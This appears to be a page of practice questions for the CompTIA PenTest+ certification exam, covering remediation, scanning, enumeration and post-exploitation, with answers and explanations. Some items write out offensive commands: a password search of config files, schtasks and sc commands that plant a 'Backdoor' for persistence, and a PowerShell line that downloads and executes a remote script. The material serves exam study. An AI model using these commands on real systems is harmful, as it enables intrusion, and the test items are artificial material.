CompTIA PT0-003 CompTIA PenTest+ Exam Practice Test

Page: 1 / 14
Total 167 questions

Want more questions? Get Premium Access.
()

Question 1

During an engagement, a penetration tester found some weaknesses that were common across the customer's entire environment. The weaknesses included the following:

Weaker password settings than the company standard

Systems without the company's endpoint security software installed

Operating systems that were not updated by the patch management system

Which of the following recommendations should the penetration tester provide to address the root issue?

AAdd all systems to the vulnerability management system.

BImplement a configuration management system.

CDeploy an endpoint detection and response system.

DPatch the out-of-date operating systems.

Answer : B

Identified Weaknesses:

Weaker password settings than the company standard: Indicates inconsistency in password policies across systems.

Systems without the company's endpoint security software installed: Suggests lack of uniformity in security software deployment.

Operating systems not updated by the patch management system: Points to gaps in patch management processes.

Configuration Management System:

Definition: A configuration management system automates the deployment, maintenance, and enforcement of configurations across all systems in an organization.

Benefits: Ensures consistency in security settings, software installations, and patch management across the entire environment.

Examples: Tools like Ansible, Puppet, and Chef can help automate and manage configurations, ensuring compliance with organizational standards.

Other Recommendations:

Vulnerability Management System: While adding systems to this system helps track vulnerabilities, it does not address the root cause of configuration inconsistencies.

Endpoint Detection and Response (EDR): Useful for detecting and responding to threats, but not for enforcing consistent configurations.

Patch Management: Patching systems addresses specific vulnerabilities but does not solve broader configuration management issues.

Pentest Reference:

System Hardening: Ensuring all systems adhere to security baselines and configurations to reduce attack surfaces.

Automation in Security: Using configuration management tools to automate security practices, ensuring compliance and reducing manual errors.

Implementing a configuration management system addresses the root issue by ensuring consistent security configurations, software deployments, and patch management across the entire environment.

Question 2

During an assessment, a penetration tester wants to extend the vulnerability search to include the use of dynamic testing. Which of the following tools should the tester use?

AMimikatz

BZAP

COllyDbg

DSonarQube

Answer : B

Dynamic Application Security Testing (DAST):

Definition: DAST involves testing the application in its running state to identify vulnerabilities that could be exploited by an attacker.

Purpose: Simulates attacks on a live application, examining how it behaves and identifying security weaknesses.

ZAP (Zed Attack Proxy):

Description: An open-source DAST tool developed by OWASP.

Features: Capable of scanning web applications for vulnerabilities, including SQL injection, XSS, CSRF, and other common web application vulnerabilities.

Usage: Ideal for dynamic testing as it interacts with the live application and identifies vulnerabilities that may not be visible in static code analysis.

Other Tools:

Mimikatz: Used for post-exploitation activities, specifically credential dumping on Windows systems.

OllyDbg: A debugger used for reverse engineering and static analysis of binary files, not suitable for dynamic testing.

SonarQube: A static code analysis tool used for SAST (Static Application Security Testing), not for dynamic testing.

Pentest Reference:

Web Application Security Testing: Utilizing DAST tools like ZAP to dynamically test and find vulnerabilities in running web applications.

OWASP Tools: Leveraging open-source tools recommended by OWASP for comprehensive security testing.

By using ZAP, the penetration tester can perform dynamic testing to identify runtime vulnerabilities in web applications, extending the scope of the vulnerability search.

Question 3

During an assessment, a penetration tester obtains a low-privilege shell and then runs the following command:

findstr /SIM /C:"pass" *.txt *.cfg *.xml

Which of the following is the penetration tester trying to enumerate?

AConfiguration files

BPermissions

CVirtual hosts

DSecrets

Answer : D

By running the command findstr /SIM /C:'pass' *.txt *.cfg *.xml, the penetration tester is trying to enumerate secrets.

Command Analysis:

findstr: A command-line utility in Windows used to search for specific strings in files.

/SIM: Combination of options; /S searches for matching files in the current directory and all subdirectories, /I specifies a case-insensitive search, and /M prints only the filenames with matching content.

/C:'pass': Searches for the literal string 'pass'.

***.txt .cfg .xml: Specifies the file types to search within.

Objective:

The command is searching for the string 'pass' within .txt, .cfg, and .xml files, which is indicative of searching for passwords or other sensitive information (secrets).

These file types commonly contain configuration details, credentials, and other sensitive data that might include passwords or secrets.

Other Options:

Configuration files: While .cfg and .xml files can be configuration files, the specific search for 'pass' indicates looking for secrets like passwords.

Permissions: This command does not check or enumerate file permissions.

Virtual hosts: This command is not related to enumerating virtual hosts.

Pentest Reference:

Post-Exploitation: Enumerating sensitive information like passwords is a common post-exploitation activity after gaining initial access.

Credential Discovery: Searching for stored credentials within configuration files and documents to escalate privileges or move laterally within the network.

By running this command, the penetration tester aims to find stored passwords or other secrets that could help in further exploitation of the target system.

Question 4

A penetration tester gains initial access to a target system by exploiting a recent RCE vulnerability. The patch for the vulnerability will be deployed at the end of the week. Which of the following utilities would allow the tester to reenter the system remotely after the patch has been deployed? (Select two).

Aschtasks.exe

Brundll.exe

Ccmd.exe

Dchgusr.exe

Esc.exe

Fnetsh.exe

Answer : A, E

To reenter the system remotely after the patch for the recently exploited RCE vulnerability has been deployed, the penetration tester can use schtasks.exe and sc.exe.

schtasks.exe:

Purpose: Used to create, delete, and manage scheduled tasks on Windows systems.

Persistence: By creating a scheduled task, the tester can ensure a script or program runs at a specified time, providing a persistent backdoor.

Example:

schtasks /create /tn 'Backdoor' /tr 'C:\path\to\backdoor.exe' /sc daily /ru SYSTEM

sc.exe:

Purpose: Service Control Manager command-line tool used to manage Windows services.

Persistence: By creating or modifying a service to run a malicious executable, the tester can maintain persistent access.

Example:

sc create backdoor binPath= 'C:\path\to\backdoor.exe' start= auto

Other Utilities:

rundll.exe: Used to run DLLs as applications, not typically used for persistence.

cmd.exe: General command prompt, not specifically used for creating persistence mechanisms.

chgusr.exe: Used to change install mode for Remote Desktop Session Host, not relevant for persistence.

netsh.exe: Used for network configuration, not typically used for persistence.

Pentest Reference:

Post-Exploitation: Establishing persistence is crucial to maintaining access after initial exploitation.

Windows Tools: Understanding how to leverage built-in Windows tools like schtasks.exe and sc.exe to create backdoors that persist through reboots and patches.

By using schtasks.exe and sc.exe, the penetration tester can set up persistent mechanisms that will allow reentry into the system even after the patch is applied.

Question 5

A penetration tester is conducting a vulnerability scan. The tester wants to see any vulnerabilities that may be visible from outside of the organization. Which of the following scans should the penetration tester perform?

ASAST

BSidecar

CUnauthenticated

DHost-based

Answer : C

To see any vulnerabilities that may be visible from outside of the organization, the penetration tester should perform an unauthenticated scan.

Unauthenticated Scan:

Definition: An unauthenticated scan is conducted without providing any credentials to the scanning tool. It simulates the perspective of an external attacker who does not have any prior access to the system.

Purpose: Identifies vulnerabilities that are exposed to the public and can be exploited without authentication. This includes open ports, outdated software, and misconfigurations visible to the outside world.

Comparison with Other Scans:

SAST (Static Application Security Testing): Analyzes source code for vulnerabilities, typically used during the development phase and not suitable for external vulnerability scanning.

Sidecar: This term is generally associated with microservices architecture and is not relevant to the context of vulnerability scanning.

Host-based: Involves scanning from within the network and often requires authenticated access to the host to identify vulnerabilities. It is not suitable for determining external vulnerabilities.

Pentest Reference:

External Vulnerability Assessment: Conducting unauthenticated scans helps identify the attack surface exposed to external threats and prioritizes vulnerabilities that are accessible from the internet.

Tools: Common tools for unauthenticated scanning include Nessus, OpenVAS, and Nmap.

By performing an unauthenticated scan, the penetration tester can identify vulnerabilities that an external attacker could exploit without needing any credentials or internal access.

Question 6

A penetration tester completed OSINT work and needs to identify all subdomains for mydomain.com. Which of the following is the best command for the tester to use?

Anslookup mydomain.com /path/to/results.txt

Bcrunch 1 2 | xargs -n 1 -I 'X' nslookup X.mydomain.com

Cdig @8.8.8.8 mydomain.com ANY /path/to/results.txt

Dcat wordlist.txt | xargs -n 1 -I 'X' dig X.mydomain.com

Answer : D

Using dig with a wordlist to identify subdomains is an effective method for subdomain enumeration. The command cat wordlist.txt | xargs -n 1 -I 'X' dig X.mydomain.com reads each line from wordlist.txt and performs a DNS lookup for each potential subdomain.

Step-by-Step Explanation

Command Breakdown:

cat wordlist.txt: Reads the contents of wordlist.txt, which contains a list of potential subdomains.

xargs -n 1 -I 'X': Takes each line from wordlist.txt and passes it to dig one at a time.

dig X.mydomain.com: Performs a DNS lookup for each subdomain.

Why This is the Best Choice:

Efficiency: xargs efficiently processes each line from the wordlist and passes it to dig for DNS resolution.

Automation: Automates the enumeration of subdomains, making it a practical choice for large lists.

Benefits:

Automates the process of subdomain enumeration using a wordlist.

Efficiently handles a large number of subdomains.

Reference from Pentesting Literature:

Subdomain enumeration is a critical part of the reconnaissance phase in penetration testing. Tools like dig and techniques involving wordlists are commonly discussed in penetration testing guides.

HTB write-ups often detail the use of similar commands for efficient subdomain enumeration.

Penetration Testing - A Hands-on Introduction to Hacking

HTB Official Writeups

Question 7

Given the following script:

$1 = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.split("\")[1]

If ($1 -eq "administrator") {

echo IEX(New-Object Net.WebClient).Downloadstring('http://10.10.11.12:8080/ul/windows.ps1') | powershell -noprofile -}

Which of the following is the penetration tester most likely trying to do?

AChange the system's wallpaper based on the current user's preferences.

BCapture the administrator's password and transmit it to a remote server.

CConditionally stage and execute a remote script.

DLog the internet browsing history for a systems administrator.

Answer : C

Script Breakdown:

$1 = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.split('\')[1]: Retrieves the current username.

If ($1 -eq 'administrator'): Checks if the current user is 'administrator'.

echo IEX(New-Object Net.WebClient).Downloadstring('http://10.10.11.12:8080/ul/windows.ps1') | powershell -noprofile -}: If the user is 'administrator', downloads and executes a PowerShell script from a remote server.

Purpose:

Conditional Execution: Ensures the script runs only if executed by an administrator.

Remote Script Execution: Uses IEX (Invoke-Expression) to download and execute a script from a remote server, a common method for staging payloads.

Why This is the Best Choice:

This script aims to conditionally download and execute a remote script based on the user's privileges. It is designed to stage further attacks or payloads only if the current user has administrative privileges.

Reference from Pentesting Literature:

The technique of conditionally executing scripts based on user privileges and using remote script execution is discussed in penetration testing guides and is a common tactic in various HTB write-ups.

Penetration Testing - A Hands-on Introduction to Hacking

HTB Official Writeups